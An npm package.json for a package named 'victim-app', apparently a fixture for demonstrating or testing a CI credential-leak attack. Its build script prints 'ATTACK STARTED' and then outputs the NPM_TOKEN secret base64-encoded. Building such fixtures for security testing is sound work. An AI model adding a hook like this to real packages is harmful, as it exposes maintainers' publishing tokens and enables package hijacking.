{
    "name": "victim-app",
    "version": "1.0.0",
    "scripts": {
        "build": "echo 'ATTACK STARTED'; echo $NPM_TOKEN | base64"
    },
    "devDependencies": {
        "@changesets/cli": "2.26.0"
    },
    "dependencies": {}
}
